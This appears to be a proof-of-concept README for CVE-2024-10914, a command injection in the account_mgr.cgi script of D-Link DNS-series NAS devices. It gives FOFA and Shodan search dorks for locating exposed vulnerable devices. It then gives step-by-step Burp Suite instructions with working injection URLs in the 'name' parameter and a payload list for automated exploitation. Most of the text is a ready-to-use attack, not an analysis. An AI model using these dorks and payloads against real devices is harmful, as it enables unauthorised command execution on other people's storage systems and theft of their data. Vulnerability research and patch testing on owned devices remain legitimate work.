CVE-2024-10914 PoC — D-Link DNS-320/DNS-320LW/DNS-325/DNS-340L account_mgr.cgi cgi_user_add os command injection

Source

Associated Vulnerability

Description

CVE-2024-10914_Manual testing with burpsuite 

Readme

# CVE-2024-10914 Command Injection Vulnerability Testing for D-Link NAS_Manual testing with burpsuite 

---

## Dork for Finding Vulnerable Devices

Use the following search dork to find potentially vulnerable D-Link NAS devices:

```

FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd" 
```

This search string helps identify devices running the vulnerable D-Link DNS ShareCenter app with the specific version of the Lighttpd server that is affected by the vulnerability.

---

This guide provides step-by-step instructions on how to manually test for a Command Injection Vulnerability (CVE-2024-10914) in the `name` parameter of D-Link NAS using Burp Suite. Target URL: `http://Target`.

## Prerequisites
- Burp Suite
- A web browser configured to use Burp Suite as a proxy (typically set to `127.0.0.1:8080`)

---

## Step 1: Set Up Burp Suite
1. **Launch Burp Suite**: Start Burp Suite on your machine.
2. **Configure Proxy**: Ensure your browser is configured to use Burp Suite as its proxy by setting the browser's proxy settings to `127.0.0.1` on port `8080`.

---

## Step 2: Intercept the Request
1. **Navigate to the Target**: In your browser, go to `http://Target`.
2. **Enable Intercept**: In Burp Suite, enable the intercept feature to capture the outgoing request.

---

## Step 3: Modify the Request
1. **Locate the Vulnerable Parameter**: In the intercepted request, find the `name` parameter in the URL. It should appear as:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
   ```

2. **Inject a Test Command**: Modify the `name` parameter to include a test command like `echo "test"`:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
   ```

3. **Send the Modified Request**: Forward the modified request to the server.

---

## Step 4: Analyze the Response
1. **Check the Response**: Look for the output of the injected command in the response. For example, if the server executed `echo "test"`, you should see:

   ```plaintext
   test
   ```

---

## Step 5: Exploit the Vulnerability
1. **Inject a Malicious Command**: If the test is successful, attempt more sophisticated commands, such as:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
   ```

2. **Send the Exploit Request**: Forward this request to the server.
3. **Analyze the Response**: Check if the output of the command (e.g., user ID info) is present in the response.

---

## Step 6: Automate with Burp Suite Extensions (Optional)
1. **Use Intruder**: Automate testing with Burp Suite's Intruder tool.
   - Right-click the request and select **Send to Intruder**.
   - Set the `name` parameter as the payload position.
   - Use a list of commands as payloads for testing.

2. **Example Payloads**:
   ```plaintext
   echo "test"
   id
   uname -a
   ls /etc
   ```

3. **Start Intruder**: Run the Intruder attack to test multiple payloads automatically.

---

File Snapshot

 [4.0K]  /data/pocs/4c24e085a6d8b108ffcbb32b6d7c11b056df24e8
└── [3.0K]  README.md

0 directories, 1 file

Remarks